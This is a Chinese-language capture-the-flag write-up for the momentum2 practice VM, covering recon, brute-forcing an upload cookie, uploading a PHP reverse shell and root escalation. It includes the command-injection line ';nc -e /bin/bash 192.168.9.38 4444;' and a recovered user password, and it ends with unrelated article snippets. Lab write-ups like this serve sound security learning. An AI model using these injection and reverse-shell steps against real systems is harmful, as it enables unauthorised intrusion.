momentum2靶机

news/2024/10/17 20:24:26/

文章妙语

遇事不决,可问春风;
春风不语,遵循己心。


文章目录

  • 文章妙语
  • 前言
  • 一、信息收集
    • 1.IP地址扫描
    • 2.端口扫描
    • 3.目录扫描
  • 二,漏洞发现
    • 分析代码
    • bp爆破
      • 1.生成字典
      • 2.生成恶意shell.php
      • 2.抓包
  • 三,漏洞利用
    • 1.反弹shell
  • 四,提权
  • 五,总结


前言

本文记录一个大学生如何辛辛苦苦升级打怪的奇异过程


一、信息收集

1.IP地址扫描

在这里插入图片描述

2.端口扫描

在这里插入图片描述

发现了 192.168.9.44 开放的端口是80,22

3.目录扫描

dirsearch -u "http://192.168.9.44"

的撒旦发

gobuster dir -u http://192.168.9.44 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,html,txt

在这里插入图片描述

二,漏洞发现

访问刚刚扫描出的目录,发现有文件上传/dashboard.html,还有我们存储上传文件的目录/owls,还有一个/ajax.php是一个空白页面,看了大佬的wp发现后面要加.bak,访问/ajax.php.bak,就得到代码

在这里插入图片描述
在这里插入图片描述

分析代码

代码如下,意思就是让我们在数据包中加cookie字段和POST数据secure=val1d,爆破到真正的字母,就可以上传php文件

cookie:admin=&G6u@B6uDXMq&Ms                       在bp中Ms后面加一个大写字母,进行爆破Content-Disposition: form-data; name="secure";  val1d 
    //The boss told me to add one more Upper Case letter at the end of the cookie老板让我在cookie的末尾再加一个大写字母if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){//[+] Add if $_POST['secure'] == 'val1d'$valid_ext = array("pdf","php","txt");}else{$valid_ext = array("txt");}// Remember success upload returns 1 记住成功上传返回1

bp爆破

1.生成字典

这里我推荐kali中自带的工具----------crunch
使用方法:生成字典:crunch 最小长度 最大长度 -t 占位符我要生成四位纯数字crunch 4 4 -t %%%%@ 代表小写字母, 代表大写字母% 代表数字^ 代表特殊字符

在这里插入图片描述

2.生成恶意shell.php

反弹shell地址

如下要先配置好地址和端口

在这里插入图片描述

2.抓包

在这里插入图片描述

抓到的包

在这里插入图片描述

修改后的包

cookie:admin=&G6u@B6uDXMq&MsA-----------------------------236152418788651125143816458      这个直接复制下面的,每个包不一样
Content-Disposition: form-data; name="secure"; val1d 
-----------------------------236152418788651125143816458

在这里插入图片描述

发送给爆破模块,intruder

在这里插入图片描述

添加字典

在这里插入图片描述

爆破,发现R的回显是1,说明上传成功

在这里插入图片描述

直接将这个包发给重发模块

在这里插入图片描述

将A改为R ,点send ,回显1,发送成功

在这里插入图片描述

三,漏洞利用

1.反弹shell

上传成功后:
先在kali上监听端口
nc -lvvp 6666
在访问/owls,点击shell.php

在这里插入图片描述
在这里插入图片描述

四,提权

找到一个flag,还有athena用户的密码,在网上查到[Asterisk]*
所以passwd:myvulnerableapp*
使用ssh连接athena

在这里插入图片描述

发现一个python文件,具有root权限,cat一下

在这里插入图片描述

就是说运行py,需要我们输入,然后脚本需要回显,就会以bash命令执行,所以我们写一个nc反弹shell

sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
nc -lvvp 4444
;nc -e /bin/bash 192.168.9.38 4444;    注意nc前面,后面都要带';'';'代表执行完前一个,执行后一个命令

在这里插入图片描述


五,总结

打靶场打累了,怎么办,那就看约尔小姐;
学习学累了,怎么办,那就看约尔小姐;
约尔小姐,可以缓解你的一切疲劳。


http://www.ppmy.cn/news/1283231.html

相关文章

CAN协议FPGA篇

一.引言 CAN(Controller Area Network)总线,即控制器局域网总线,是一种功能丰富的车用总线标准。该协议最初是由德国博世(Bosch)公司在1983年制定的,之后在美国密歇根州底特律举行的汽车工程师协…

python产生任意位数随机密码的示例代码

import string rdmstrstring.ascii_lettersstring.digitsstring.punctuation; #依次是26*2个字母,0-9数字,标点符号 import random print(.join([random.choice(rdmstr) for i in range(15)])) #其中把15改为任意整数就可以设置密码长度

Volume Control 2

为游戏添加音乐和音效总是需要一些编码来设置一个系统来控制、显示和保存应用程序的音量设置。 音量控制的设计是为了立即为您设置这些内容,让您有更多时间专注于最重要的事情——制作出色的游戏! 在版本2中,我们对系统进行了重新设计,使其更加模块化、灵活,甚至更易于使用…

Java 面试题集锦记录

Java 面试题集锦记录 一1. SpringBoot、SpringCloud区别2. SpringCloud怎么保证服务间通信?3. Spring怎么保持高可用性、稳定性?4. 负载均衡5. [Rabbitmq](https://blog.csdn.net/qq_40985985/article/details/128013229) 怎么避免重复消费,[…

嵌入式开发——DMA外设到内存

学习目标 加强理解DMA数据传输过程加强掌握DMA的初始化流程掌握DMA数据表查询理解源和目标的配置理解数据传输特点能够动态配置源数据学习内容 需求 uint8_t data; 串口接收(&data);data有数据了 实现串口的数据接收,要求采用dma的方式。 数据交互流程 CPU配置好DMA外…

数模学习02-Matlab基础知识入门

先把matlab下载好。然后你就会发现电脑有少了几十个GB。服啦~ 修改字体 字体真的是太小了,其实我无论是使用什么编辑器我一般都会先改字体,字体在开始中有一个预设,可以修改字体,这样眼睛看着也会舒服一点 命令行窗口的使用 这…

AutoSAR(基础入门篇)2.2-AutoSAR架构中的Ports类型与Runnables可运行实体

Ports的类型 一、接口的类型 1、S/R接口 2、C/S接口 Runnables可运行实体

【力扣题解】P589-N叉树的前序遍历-Java题解

👨‍💻博客主页:花无缺 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 本文由 花无缺 原创 收录于专栏 【力扣题解】 文章目录 【力扣题解】P589-N叉树的前序遍历🌏题目描述💡题解🌏总结 【力…